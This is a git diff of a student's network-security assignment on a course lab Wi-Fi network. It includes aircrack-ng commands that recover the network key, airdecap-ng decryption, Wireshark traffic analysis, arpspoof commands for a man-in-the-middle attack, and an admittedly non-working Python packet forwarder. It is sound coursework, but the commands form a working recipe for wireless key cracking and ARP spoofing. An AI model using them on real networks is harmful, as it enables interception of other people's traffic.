Assignment 2

11 files changed, 322 insertions, 0 deletions

diff --git a/.gitignore b/.gitignore
index 4450ceb..082c752 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,6 @@
 *.pyc
 *.tar.gz
 assignment*.pdf
+*.cap
+*.pcap
 
diff --git a/netsec-assignment2-S4498062/exercise1 b/netsec-assignment2-S4498062/exercise1
new file mode 100644
index 0000000..3489e4b
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise1
@@ -0,0 +1 @@
+From that information I would assume some symmetric cipher is used, which would mean every client can encrypt and decrypt and thus also sniff. So, I wouldn't say WPA2-PSK is secure against clients sniffing traffic in the network, regardless of the key used.
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2a b/netsec-assignment2-S4498062/exercise2/exercise2a
new file mode 100644
index 0000000..d076017
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2a
@@ -0,0 +1,22 @@
+    # service NetworkManager stop
+    # airmon-ng start wlan0
+    # airodump-ng mon0
+
+We see the following networks (the target is marked with a +):
+
+      ESSID                     BSSID               CH
+      eduroam                   
+      ru-guest                  
+      eduroam-config            
+    + NetSec Homework Net (Pol) 48:5B:39:89:8C:10   1
+
+And the clients:
+
+    BSSID              STATION            PWR   Rate     Lost   Frames  Probe
+    48:5B:39:89:8C:10  00:0F:C9:0C:EE:ED  -63   24 -54     96     1410
+    48:5B:39:89:8C:10  00:0F:C9:0C:F7:8C  -65   48 -54     95      960
+    48:5B:39:89:8C:10  00:0F:C9:0C:F7:93  -71   54 -54    158     1479
+
+The MAC addresses all start with the same 35 bits, so either they were made by
+the same vendor or they were changed manually.
+   
diff --git a/netsec-assignment2-S4498062/exercise2/exercise2b b/netsec-assignment2-S4498062/exercise2/exercise2b
new file mode 100644
index 0000000..5c2cc9c
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise2/exercise2b
@@ -0,0 +1,8 @@
+# airodump-ng -c 1 --bssid 48:5B:39:89:8C:10 -w outputnetsec mon0
+# aircrack-ng --bssid 48:5B:39:89:8C:10 outputnetsec-01.cap
+
+    [..]
+
+     KEY FOUND! [ 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20 ] 
+    Decrypted correctly: 100%
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3a b/netsec-assignment2-S4498062/exercise3/exercise3a
new file mode 100644
index 0000000..e587296
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3a
@@ -0,0 +1,4 @@
+There doesn't seem too much useful because we only see 802.11 protocol stuff.
+Wireshark cannot distinguish other protocols because we didn't give it the key
+to decrypt the encrypted Wi-Fi packets.
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3b b/netsec-assignment2-S4498062/exercise3/exercise3b
new file mode 100644
index 0000000..0245301
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3b
@@ -0,0 +1,72 @@
+The comments summary:
+
+Summary created by Wireshark  (Git Rev Unknown from unknown)
+
+    File: 
+       Name: /.../netsec-assignment2-S4498062/exercise3/outputnetsec-01.cap
+       Length: 161961977 bytes
+       Format: Wireshark/tcpdump/... - pcap
+       Encapsulation: IEEE 802.11 Wireless LAN
+       Packet size limit: 65535 bytes
+    
+    
+    Time:
+       First packet: 2015-09-11 08:52:12
+       Last packet: 2015-09-11 09:16:57
+       Elapsed: 00:24:45
+    
+    
+    Capture:
+    
+       Unknown interface:
+          Dropped packets: unknown
+          Capture filter: unknown
+          Link type: IEEE 802.11 Wireless LAN
+          Packet size limit 65535 bytes
+    
+    Statistics:
+       Packets: 543544
+       Between first and last packet:1485.708 sec
+       Avg. packets/sec: 365.849
+       Avg packet size: 281.974 bytes
+       Bytes: 153265265
+       Avg bytes/sec: 103159.778
+       Avg Mbit/sec: 0.825
+
+In Statistics > Conversations, we see the most active clients:
+
+    "Address A","Address B","Packets","Bytes","Packets A→B","Bytes A→B","Packets A←B","Bytes A←B","Rel Start","Duration","bps A→B","bps A←B"
+    "Allnet_0c:f7:8c","Allnet_0c:f7:93","94165","80983864","55537","77358388","38628","3625476","-0.000004000","1485.6989","416549.48","19522.00"
+    "Allnet_0c:ee:ed","Allnet_0c:f7:93","109921","67395252","65601","6130612","44320","61264640","-0.000003000","1485.7076","33011.14","329888.01"
+    "Allnet_0c:ee:ed","Allnet_0c:f7:8c","8739","999840","4098","479032","4641","520808","0.066556000","1485.1628","2580.36","2805.39"
+    "AsustekC_89:8c:10","IntelCor_25:1b:e2","1080","106920","1080","106920","0","0","6.014339000","1476.0891","579.48","N/A"
+    "AsustekC_89:8c:10","Azurewav_8d:55:58","292","28908","292","28908","0","0","47.326149000","1380.3753","167.54","N/A"
+    "AsustekC_89:8c:10","IntelCor_ed:f2:0b","233","23067","233","23067","0","0","40.717828000","1408.6099","131.01","N/A"
+    "AsustekC_89:8c:10","LgElectr_65:c2:1e","186","18414","186","18414","0","0","196.765954000","1089.9483","135.16","N/A"
+    "AsustekC_89:8c:10","50:a7:2b:79:98:e7","134","13266","134","13266","0","0","1037.606722000","60.9406","1741.50","N/A"
+    "AsustekC_89:8c:10","HonHaiPr_4a:b3:b3","76","7524","76","7524","0","0","21.791043000","1329.0226","45.29","N/A"
+    "IntelCor_a3:19:61","AsustekC_89:8c:10","76","7524","0","0","76","7524","697.795714000","679.1029","N/A","88.63"
+    "IntelCor_e2:52:c0","AsustekC_89:8c:10","48","4752","0","0","48","4752","159.485889000","1289.6303","N/A","29.48"
+    "Azurewav_4a:18:ef","AsustekC_89:8c:10","47","4653","0","0","47","4653","110.878660000","1320.6467","N/A","28.19"
+    "34:fc:ef:a4:20:02","AsustekC_89:8c:10","42","4158","0","0","42","4158","298.310273000","949.5807","N/A","35.03"
+    "AsustekC_89:8c:10","Jolla_01:30:c6","40","3960","40","3960","0","0","569.697859000","197.4624","160.44","N/A"
+    "AsustekC_89:8c:10","SonyMobi_44:eb:da","30","2970","30","2970","0","0","61.584704000","60.0957","395.37","N/A"
+    "SamsungE_34:6b:88","AsustekC_89:8c:10","26","2574","0","0","26","2574","253.012801000","408.3589","N/A","50.43"
+    "AsustekC_89:8c:10","SamsungE_55:3b:c3","23","2277","23","2277","0","0","200.722946000","856.3267","21.27","N/A"
+    "SamsungE_6e:9a:01","AsustekC_89:8c:10","17","1683","0","0","17","1683","11.333827000","304.7486","N/A","44.18"
+    "AsustekC_89:8c:10","SamsungE_41:25:74","13","1287","13","1287","0","0","904.035331000","20.4690","503.00","N/A"
+    "AsustekC_89:8c:10","Apple_35:43:18","9","891","9","891","0","0","259.246274000","501.2417","14.22","N/A"
+    "SimTechn_64:6a:a5","AsustekC_89:8c:10","7","693","0","0","7","693","596.423938000","654.5950","N/A","8.47"
+    "SamsungE_8f:28:47","AsustekC_89:8c:10","7","693","0","0","7","693","1276.488448000","0.0077","N/A","721875.00"
+    "AsustekC_89:8c:10","Apple_9c:bc:42","6","594","6","594","0","0","1376.221698000","0.0159","299395.16","N/A"
+    "Htc_76:de:49","AsustekC_89:8c:10","3","297","0","0","3","297","890.820803000","0.0205","N/A","116009.96"
+    "HuaweiTe_ba:27:00","AsustekC_89:8c:10","3","297","0","0","3","297","1163.479234000","0.0036","N/A","662576.69"
+    "AsustekC_89:8c:10","SamsungE_27:7b:4a","2","198","2","198","0","0","851.540162000","0.0195","81418.66","N/A"
+    "AsustekC_89:8c:10","Broadcast","1","105","1","105","0","0","0.000003000","0.0000","N/A","N/A"
+    "AsustekC_89:8c:10","Motorola_2c:ab:db","1","99","1","99","0","0","1004.081411000","0.0000","N/A","N/A"
+    "AsustekC_89:8c:10","IntelCor_4f:b6:a9","1","99","1","99","0","0","1148.830019000","0.0000","N/A","N/A"
+
+Clearly, Allnet_0c:{f7:8c,ee:ed,f7:93} are the most active.
+
+The protocol hierarchy only shows 802.11 and its data. We're using an encrypted capture, so Wireshark cannot distinguish the different protocols (as explained in exercise3a).
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3c b/netsec-assignment2-S4498062/exercise3/exercise3c
new file mode 100644
index 0000000..88b70fd
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3c
@@ -0,0 +1,10 @@
+$ airdecap-ng -l -b 48:5B:39:89:8C:10 -w 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20 outputnetsec-01.cap 
+Total number of packets read        543544
+Total number of WEP data packets    200052
+Total number of WPA data packets         0
+Number of plaintext data packets         0
+Number of decrypted WEP  packets    200052
+Number of corrupted WEP  packets         0
+Number of decrypted WPA  packets         0
+
+Now we use the decrypted capture, so Wireshark is able to distinguish other protocols than 802.11.
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3d b/netsec-assignment2-S4498062/exercise3/exercise3d
new file mode 100644
index 0000000..26dea2d
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3d
@@ -0,0 +1,68 @@
+The comments summary:
+
+    Summary created by Wireshark  (Git Rev Unknown from unknown)
+    
+    File: 
+       Name: /.../netsec-assignment2-S4498062/exercise3/outputnetsec-01-dec.cap
+       Length: 140897136 bytes
+       Format: Wireshark/tcpdump/... - pcap
+       Encapsulation: IEEE 802.11 Wireless LAN
+       Packet size limit: 65535 bytes
+    
+    
+    Time:
+       First packet: 2015-09-11 08:52:12
+       Last packet: 2015-09-11 09:16:57
+       Elapsed: 00:24:45
+    
+    
+    Capture:
+    
+       Unknown interface:
+          Dropped packets: unknown
+          Capture filter: unknown
+          Link type: IEEE 802.11 Wireless LAN
+          Packet size limit 65535 bytes
+    
+    Statistics:
+       Packets: 200052
+       Between first and last packet:1485.708 sec
+       Avg. packets/sec: 134.651
+       Avg packet size: 688.302 bytes
+       Bytes: 137696296
+       Avg bytes/sec: 92680.617
+       Avg Mbit/sec: 0.741
+
+The IP conversations:
+
+    "Address A","Address B","Packets","Bytes","Packets A→B","Bytes A→B","Packets A←B","Bytes A←B","Rel Start","Duration","bps A→B","bps A←B"
+    "192.168.84.40","192.168.84.79","4743","550188","2791","323756","1952","226432","0.000000000","1485.2227","1743.88","1219.65"
+    "192.168.84.51","192.168.84.68","97598","57695108","61316","5156724","36282","52538384","-0.000003000","1485.7076","27767.10","282900.27"
+    "192.168.84.10","192.168.84.62","85260","78089584","51881","75285124","33379","2804460","-0.000004000","1485.6989","405385.64","15101.10"
+    "192.168.84.10","192.168.84.47","5570","646120","2788","323408","2782","322712","0.066556000","1485.1628","1742.07","1738.33"
+    "192.168.84.10","192.168.84.60","4682","543112","2721","315636","1961","227476","0.975936000","1484.1761","1701.34","1226.14"
+    "192.168.84.10","192.168.84.56","1832","150164","919","66168","913","83996","1.014845000","1482.2693","357.12","453.34"
+
+Conversation .10 and .62:
+    
+    These clients only use TCP. The data seems to be hexadecimal ascii
+    characters. I did not convert that to see what they're sending.
+
+Conversation .51 and .68:
+
+    This is similar to the one above.
+
+The protocol hierarchy looks more interesting now (percentages are given in % 
+packets):
+
+    - There's some ARP messages (0.18%)
+    - But mostly IP (99.82%)
+    - Of which most are TCP (92.32%)
+    - But also some ICMP (7.5%)
+
+NOTE:
+As it turns out, there was something wrong with the network when I sniffed. Another student had the same problem, but retrying later gave
+him UDP packets with something like "Insert your student number here". I did not have the time to sniff again and look at the details again.
+As a result, I didn't understand what was the point of exercise 4b (see note there as well).
+As a proof, I can send you the cap file. Because of its size I will only do that on request (info@camilstaps.nl).
+
diff --git a/netsec-assignment2-S4498062/exercise3/exercise3e b/netsec-assignment2-S4498062/exercise3/exercise3e
new file mode 100644
index 0000000..e195f2c
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise3/exercise3e
@@ -0,0 +1,10 @@
+In the Conversations > TCP view, we see many very short (few packets) 
+conversations between 192.168.84.56 (several ports) and 192.168.86.10:21057. I
+would guess then that .56 is being rejected by .10.
+Using the filter
+
+    ip.addr==192.168.84.56 and ip.addr==192.168.84.10
+
+this is confirmed. We see many TCP packets from .56 with SYN, but .10
+continuously repeats with RST, ACK.
+
diff --git a/netsec-assignment2-S4498062/exercise4/exercise4a b/netsec-assignment2-S4498062/exercise4/exercise4a
new file mode 100644
index 0000000..016e211
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise4/exercise4a
@@ -0,0 +1,28 @@
+    # echo 1 > /proc/sys/net/ipv4/ip_forward
+    # ifconfig wlan0 down
+    # iwconfig wlan0 mode managed
+    # iwconfig wlan0 essid "NetSec Homework Net (Pol)"
+    # iwconfig wlan0 ap 48:5B:39:89:8C:10
+    # iwconfig wlan0 key 37:00:9C:49:21:61:1E:4A:1A:44:6E:2F:20
+    # ifconfig wlan0 up
+    # ifconfig wlan0 192.168.84.100
+
+You should *not* run Wireshark with root rights, but rather add yourself to the
+wireshark group (at least, that's what it told me). In any case, the pings do
+show up.
+
+I'm going to perform MITM between .10 and .62:
+
+    # arpspoof -t 192.168.84.10 192.168.84.62
+    # arpspoof -t 192.168.84.62 192.168.84.10
+
+For some reason in Wireshark I then see pings between .60 (and .100 and .100) 
+and .10 (why .60 instead of .62?).
+
+We're seeing two sets because we're playing MITM:
+
+   .10  <-----------> .100 (us) <------------> .62
+          first set               second set
+
+All packets have to be sent twice for this to work.
+
diff --git a/netsec-assignment2-S4498062/exercise4/mitm.py b/netsec-assignment2-S4498062/exercise4/mitm.py
new file mode 100755
index 0000000..3d4fdb8
--- /dev/null
+++ b/netsec-assignment2-S4498062/exercise4/mitm.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python3
+
+# NOTE: as explained in 3d, I was working on this when something was wrong with
+# the network, and as a result, didn't get the point of this exercise.
+# This code does *not* work. I am quite confident I could get it to work, but
+# don't have the time to redo everything. 
+
+import socket
+import struct
+import math
+
+mac_1 = b'\x00\x0f\xc9\x0c\xee\xed'
+mac_2 = b'\x00\x0f\xc9\x0c\xf7\x93'
+
+def parse_tcp(packet):
+    header_length = packet[12] * 4
+    header = packet[:14] # We don't care about the variable length options
+    data = packet[header_length:]
+    src_port, dst_port, seqn, ackn, flags = struct.unpack("!HHIIxB", header)
+    return src_port, dst_port, seqn, ackn, flags, data
+
+def parse_udp(packet):
+    header_length = 8
+    header = packet[:header_length]
+    data = packet[header_length:]
+    src_port, dst_port, data_len, checksum = struct.unpack("!HHHH", header)
+    return src_port, dst_port, data_len, data, checksum
+
+def parse_ip(packet):
+    header_length_in_bytes = (packet[0] & 0x0f) * 4
+    header = packet[:20]
+    data = packet[header_length_in_bytes:]
+    length, protocol, src, dst = struct.unpack("!xxHxxxxxBxx4s4s", header)
+    header = {'length': length,
+            'protocol': protocol,
+            'source': src,
+            'destination': dst}
+    return header_length_in_bytes, header, data
+
+def format_ip(addr):
+    return '.'.join('%d'%i for i in addr)
+
+def parse_eth(packet):
+    if (packet[13:14] == b'\x81\x00'):
+        dst, src, typecode = struct.unpack("!6s6sxxxx2s", packet[:18])
+        data = packet[18:]
+    else:
+        dst, src, typecode = struct.unpack("!6s6s2s", packet[:14])
+        data = packet[14:]
+    return dst, src, typecode, data
+
+def format_mac(addr):
+    return ':'.join('%02x'%i for i in addr)
+
+def main():
+    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
+    while True:
+        raw, address = s.recvfrom(2 ** 16 - 1)
+
+        eth_dst, eth_src, eth_type, eth_data = parse_eth(raw)
+
+        if eth_type == b'\x08\x00': # IP
+            print("ETH:  {} --> {} ({})".format(
+                format_mac(eth_dst), format_mac(eth_src), eth_type))
+
+            ip_header_len, ip_header, ip_payload = parse_ip(eth_data)
+            print("IP:   {} --> {} ({:04x})".format(
+                format_ip(ip_header['source']), 
+                format_ip(ip_header['destination']),
+                ip_header['protocol']))
+
+            if ip_header['protocol'] == 0x11: # UDP
+                src_port, dst_port, _, udp_data, _ = parse_udp(ip_payload)
+                print("UDP:  :{} --> :{}".format(
+                    src_port, dst_port))
+            elif ip_header['protocol'] == 0x06: # TCP
+                src_port, dst_port, seqn, ackn, flags, tcp_data = parse_tcp(
+                        ip_payload)
+                print("TCP:  :{} --> :{} / SEQ:{} ACK:{} ({:#02x})".format(
+                    src_port, dst_port, seqn, ackn, flags))
+
+                if eth_src == mac_1:
+                    eth_dst = mac_2
+                    s.sendto(eth_dst + eth_src + eth_type + eth_data, ip_header['destination'])
+                    print("Forwarded to {}".format(mac_2))
+                elif eth_src == mac_2:
+                    eth_dst = mac_1
+                    s.sendto(eth_dst + eth_src + eth_type + eth_data, ip_header['destination'])
+                    print("Forwarded to {}".format(mac_1))
+
+
+
+        print()
+
+if __name__ == "__main__":
+    main()
+